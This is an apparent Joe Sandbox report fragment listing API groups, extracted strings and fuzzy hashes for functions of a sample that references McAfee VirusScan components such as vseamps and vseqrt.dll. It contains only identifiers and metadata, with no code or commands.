                                                    • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                    • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                                    • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                                    • API String ID: 883923345-381368982
                                                    • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                    • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                                    • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                    • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                                    • String ID:
                                                    • API String ID: 1613947383-0
                                                    • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                    • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                                    • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                    • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                    • String ID:
                                                    • API String ID: 1995290849-0
                                                    • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                    • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                                    • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                    • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                    • String ID:
                                                    • API String ID: 1995290849-0
                                                    • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                    • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                                    • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                    • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                                    • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                    • API String ID: 93015348-1041928032
                                                    • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                    • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                                    • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                    • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                                    • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                                    • API String ID: 3682727354-300733478
                                                    • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                    • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                                    • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                    • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                                    • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                                    • API String ID: 2587151837-1427723692
                                                    • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                    • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                                    • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                    • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                                    • String ID: SetDllDirectoryW$kernel32.dll
                                                    • API String ID: 3184163350-3826188083
                                                    • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                    • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                                    • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                    • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcesslstrlen
                                                    • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                    • API String ID: 3424473247-996641649
                                                    • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                    • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                                    • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                    • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: String$ByteCharMultiWide$ErrorLast
                                                    • String ID:
                                                    • API String ID: 1775797328-0
                                                    • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                    • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                                    • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                    • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                                    • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                                    • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                                    • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                                    • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                                    • String ID:
                                                    • API String ID: 1232609184-0
                                                    • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                    • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                                    • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                    • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                                    • String ID: H
                                                    • API String ID: 2107338056-2852464175
                                                    • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                    • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                                    • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                    • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                                    • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                                    • API String ID: 1322048431-2685357988
                                                    • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                    • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                                    • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                    • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                    • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                                    • API String ID: 2984211723-3002863673
                                                    • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                    • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                                    • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                    • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                                    • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                                    • API String ID: 678758403-4129911376
                                                    • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                    • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                                    • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                    • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcesslstrlen
                                                    • String ID:
                                                    • API String ID: 3424473247-0
                                                    • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                    • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                                    • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                    • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                                    • String ID: bad exception$csm$csm$csm
                                                    • API String ID: 3766904988-820278400
                                                    • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                    • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                                    • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                    • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                                    • String ID:
                                                    • API String ID: 2707001247-0
                                                    • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                    • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                                    • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                    • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                    • Instruction ID: 114f8bf869e1806a40e23852e656a6b366ce9cb1be42bcab21f3d4d9a7b5d01d
                                                    • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                    • Instruction Fuzzy Hash: 4DD14E22A087418BEB289BA9D4823AD77A4FB457DCF106135DF8D9BB56DF38E491C700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                    • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                                    • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                    • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                                    APIs
                                                    Memory Dump Source
